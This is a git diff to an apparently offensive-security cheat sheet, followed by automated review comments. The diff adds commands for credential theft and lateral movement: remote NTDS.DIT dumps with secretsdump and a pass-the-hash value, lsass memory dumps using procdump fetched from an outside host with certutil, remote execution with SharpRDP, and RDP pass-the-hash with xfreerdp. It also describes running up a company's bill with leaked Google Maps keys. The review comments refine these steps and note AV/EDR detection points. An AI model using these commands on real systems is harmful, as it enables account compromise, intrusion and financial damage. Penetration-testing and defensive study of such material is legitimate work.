diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index a269395..8be1b6f 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -6,6 +6,7 @@ - [Tools](#tools) - [Exploit](#exploit) + - [Google Maps](#google-maps) - [Algolia](#algolia) - [AWS Access Key ID & Secret](#aws-access-key-id--secret) - [Slack API Token](#slack-api-token) @@ -27,6 +28,14 @@ The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token. +### Google Maps + +Use : https://github.com/ozguralp/gmapsapiscanner/ + +Impact: +* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company +* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account + ### Algolia ```powershell diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 2ca3d36..04b3d51 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -489,10 +489,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL secretsdump also works remotely ```java -./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss +./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 ``` +* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. +* `-user-status`: Display whether or not the user is disabled. + #### Alternatives - modules Metasploit modules diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 5b8f937..0894a25 100644 --- a/Methodology and Resources/Windows - Mimikatz.md 
+++ b/Methodology and Resources/Windows - Mimikatz.md @@ -63,8 +63,11 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo Dump the lsass process. ```powershell -C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp +# HTTP method +certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe +C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp +# SMB method net use Z: https://live.sysinternals.com Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index e927607..75d708d 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -131,8 +131,15 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get ## RDP Remote Desktop Protocol +Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP) + +```powershell +SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password +``` + +Or connect remotely with `rdesktop` + ```powershell -python rdpcheck.py DOMAIN/username:password@10.10.10.10 rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size @@ -165,7 +172,7 @@ or with Metasploit run getgui -u admin -p 1234 ``` -Then log in using xfreerdp +or with xfreerdp ```powershell xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ @@ -173,7 +180,6 @@ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the xfreerd /u:runner /v:10.0.0.1 # password will be asked ``` - ## Netuse Windows only
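Review bot: in the API Key Leaks hunk, the second Impact bullet of the new Google Maps section states the condition backwards: a maximum-bill or daily-quota limit is what makes the denial of service possible (an attacker exhausts it and legitimate callers are refused), it is not a precondition that has to be absent. Suggest splitting the two bullets cleanly, e.g. `* No billing cap configured: unauthorized use of the key is billed to the company (financial damage)` and `* Billing cap or daily quota configured: an attacker can exhaust it and deny the Maps service to legitimate users`. Also tidy `Use : https://github.com/ozguralp/gmapsapiscanner/` to `Use: ...` to match the other sections, and consider a one-line note on which key format the scanner expects so readers know what to grep for before running it.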
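Review bot: in the Active Directory Attack hunk, `-pwd-last-set -user-status` are appended only to the `-use-vss` command while the `-just-dc` command on the next line, which is the more common remote NTDS dump, does not get them; either add them there too or say in the two new bullets that the flags apply to any NTDS.DIT dump (local file, `-use-vss`, or `-just-dc`). The fence around these commands is still tagged ```java although they are shell commands; the other files in this patch use ```powershell, so retag it while touching the block.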
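Review bot: in the Mimikatz hunk the `# SMB method` label is wrong: `net use Z: https://live.sysinternals.com` mounts the share over WebDAV on HTTPS (443), not SMB (445), so rename it `# WebDAV method`; readers choosing between the two methods based on which egress port is open will otherwise pick the wrong one. The `# HTTP method` fetches procdump over plain `http://` although the same host is reached over `https://` two lines later; use `https://live.sysinternals.com/procdump.exe` in the certutil line as well. Worth a short caveat that `certutil -urlcache -split -f`, `live.sysinternals.com` and a drop into `C:\Users\Public` are heavily signatured by AV/EDR, so on a monitored host the lsass dump will likely be caught at download time rather than at `-ma lsass.exe`.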
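Review bot: in the Windows - Using credentials hunk, `python rdpcheck.py DOMAIN/username:password@10.10.10.10` is removed without replacement or explanation; it was the only entry in the RDP section that validates credentials without opening a session, so either keep it or state why it goes. For the new SharpRDP line, `command="C:\Temp\file.exe"` runs a file that must already exist on the target (the sentence above only says SharpRDP executes commands over RDP, it does not transfer files), so note that the payload has to be dropped on the box first, and that this creates an interactive RDP logon on the target, which is noisier than the PsExec line just above. Minor: `xfreerd /u:runner /v:10.0.0.1` in the unchanged context two lines below is a typo for `xfreerdp`; fix it while this file is being edited.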